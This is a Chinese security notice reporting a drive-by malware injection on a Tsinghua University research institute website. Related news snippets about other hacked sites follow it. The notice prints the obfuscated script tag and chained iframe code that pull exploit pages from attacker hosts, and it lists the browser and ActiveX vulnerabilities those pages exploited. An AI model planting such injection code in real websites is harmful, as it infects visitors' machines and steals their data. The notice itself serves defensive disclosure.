清华大学房地产研究所遭遇黑客入侵挂马

清华大学房地产研究所(hxxp://www.ires.tsinghua.edu.cn/)被黑客植入病毒,用户如果访问该网页,系统
就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。

该网站问题代码:

<script language=javascript src=hxxp://%71%2E%39%34%73%61%6F%6D%6D%2E%63%6F%6D/js.js></script>

hxxp://q.94saomm.com/js.js问题框架代码:

<iframe src=hxxp:\/\/tqyb.960960.net\/yu\/rs.htm w
idth=100 height=0><\/iframe>

hxxp://tqyb.960960.net/yu/rs.htm问题框架代码:

<iframe src=x.htm width=100 height=1><\/iframe>

hxxp://tqyb.960960.net/yu/x.htm问题框架代码

经解密后,发现该挂马网页通过以下几个漏洞进行传播:

RealPlayer播放器IERPCtl.IERPCtl.1漏洞

RealNetworks RealPlayer rmoc3260.dll ActiveX控件内存破坏漏洞

MS06-014漏洞

联众世界GLIEDown2.dll Active控件多个缓冲区溢出漏洞

新浪DLoader Class ActiveX控件任意文件下载漏洞

MS08-041漏洞

暴风影音2009(mps.dll)ActiveX远程栈溢出漏洞

超星阅读器4.0漏洞

UUSee网络电视2008漏洞

联众世界GLWorld HanGamePluginCn18类ActiveX控件栈溢出漏洞

MS09-002漏洞

【注:基于安全考虑,所有网络链接“http”均已被替换为“hxxp”,特此说明。】

时间: 2024-11-09 03:35:59

清华大学房地产研究所遭遇黑客入侵挂马的相关文章

高考临近黑客借机挂马128家高校网站中毒

一年一度的高考临近 高校网站访问量激增 黑客们借机挂马牟利 北大.清华等网站中招 本报讯(记者 杨帆)一年一度的高考已进入读秒阶段,黑客却要借此机会大赚一笔. 据记者了解,高考前后一个专业黑客通过挂马网页至少可以获利万元以上,原本看似最没有利润可图的学生群体,却成了时下黑客眼中的最佳赚钱的目标. 据360安全卫士恶意网页监测数据显示,有关高考的挂马网页正在急剧上升. 仅14日一天,就有包括北大.清华等在内的128家高校网站遭遇挂马. 截至记者发稿时,绝大部分被挂马高校网站问题依旧存在. 中毒案例

拉拉网最近还曾被黑客植入挂马页面

[赛迪网讯]2月14日情人节消息,今日有网友爆料称,女同交友网站拉拉网(www.15880.com)正在遭到黑客攻击,网站被迫暂停运营,至今无法正常访问.另据360网站安全检测平台之前的分析结果,拉拉网最近还曾被黑客植入挂马页面,对没有安全措施的访问者电脑也会造成一定风险. 据了解,拉拉网是一个面向华人的拉拉网站,提供LES交友.LES小说.形式婚姻.爱情诊所等多种服务.通过百度快照查看,该网站曾宣布已经拥有50万注册用户,是国内人气最高的女同交友网站之一. 目前拉拉网主页显示,"因机房被攻击暂

医药数据安全遭遇黑客入侵 4年获利千万

本文讲的是 :  医药数据安全遭遇黑客入侵 4年获利千万  , "统方"是医院里的一种专业术语,是指一家医院对医生处方用药信息的统计.医院用得最多的是哪些药?哪种药比较受医生青睐?这些都能从"统方"中看出来. 对普通老百姓来说,这些数据价值不大.但对于医药代表和医药公司来说,却是宝贝.有了这些资料,他们在推销药品时就能有的放矢.只是,几乎所有的医院,这些数据都是保密的,并且有安全防护,很难搞到手. 温州鹿城区法院判决的一起案子,黑客团伙就利用技术手段,窃取省内多家医

少林武校网站遭“踢馆” 黑客疯狂挂马

中介交易 SEO诊断 淘宝客 云主机 技术大厅 随着前一阵"武林大会"擂台赛在央视的热播,尤其是4月20日首届中国武术散打超级联赛高调启动后,国内迅速掀起一股习武热潮,各种武术培训班的咨询电话炙手可热.可嵩山少林武术职业学院的雷老师怎么也没想到,武术热竟给自己负责的学院官网带来了麻烦.4月22日,当雷老师刚登陆官网就发现,360安全卫士竟然在其网站上发现并拦截到了木马! 图一:嵩山少林武术职业学院官网首页被"挂马"遭360拦截 360安全中心的专家表示,正是少林武术

“北大青鸟”被黑 黑客钓鱼挂马两不误

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 据瑞星"云安全"系统监测,4月27日,"ha0123网址之家"."北大青鸟"."戴尔常州授权体验中心"等网站被黑客挂马,用户浏览这些网站后,会感染木马病毒:Trojan.DL.Win32.Mnless.dbe(梅勒斯木马),这个木马会从黑客指定网站下载各种木马到用

法国一新闻网站遭遇黑客入侵发布总统死讯

法国一家http://www.aliyun.com/zixun/aggregation/8494.html">新闻网站26日疑遭黑客入侵,发布了该国总统萨科齐的死讯,这条乌龙消息数小时后才被删除. 26日,总部设在法国南部城市图卢兹的"南部新闻社"网站(www.midipresse.fr)出现了一条冒用法新社名义的电讯稿,宣称法国总统尼古拉·萨科齐死于一场交通事故,这则"新闻"在该网站页面上停留了数小时. "南部新闻社"是一家专门

游迅网、技嘉科技等知名网站遭黑客挂马

来自360安全卫士官方微博的消息称,本周末网站挂马攻击猖獗,技嘉科技中文官网.游迅网等多个知名网站被黑客入侵挂马.其中,游迅网已经连续两个周末出现大面积挂马情况,攻击页面还会篡改用户浏览器主页为www.2345.com/?kiss54321,赚取主页推广费.图:游迅网一周内第二次被挂马网站挂马是指网站页面中植入了恶意代码.一旦有 网友浏览页面,恶意代码会攻击电脑系统和软件的漏洞,使网友电脑自动下载运行黑客埋伏好的木马程序.据了解,技嘉科技中文官网和游迅网都是被黑客在整个网站挂马,存在恶意代码的网

瑞星误报微软淘宝和360等网站挂马

11月2日凌晨,网上数十家BBS里忽然出现一篇题为<360安全卫士官方网站被挂马>的帖子,说是据瑞星挂马监测数据显示,360官网首页在过去1个月被12次挂马.对此,360总裁齐向东表示:"经我们调查发现,360网站根本就没有挂马,此事系瑞星严重误报,并由某些杀毒厂商在暗中推动传播.不仅仅是360,同时被瑞星误报为'挂马网站'的还有微软.淘宝.巨人.腾讯.雅虎.阿里巴巴等知名网站." 齐向东表示,瑞星对全社会公开提供的"云安全网站联盟"挂马监测站从上线以来

IE“极光”0day漏洞攻击量激增上万网站挂马

微软IE"极光"0Day漏洞挂马网站增长趋势图(数据来源:360安全中心) 中新网1月21日电 IE浏览器新近曝出的"极光"0day漏洞正在引发空前迅猛的挂马攻击.来自360安全中心的监控数据显示,1月18日至1月20日三天内,黑客利用该漏洞挂马的网站数量从220家猛增到10812家,相关挂马网页数量更是高达141856个. 360安全专家石晓虹博士呼吁广大网民务必开启防火墙,再打上360临时补丁,可以彻底保护IE系列浏览器的上网安全.石晓虹介绍说,"极光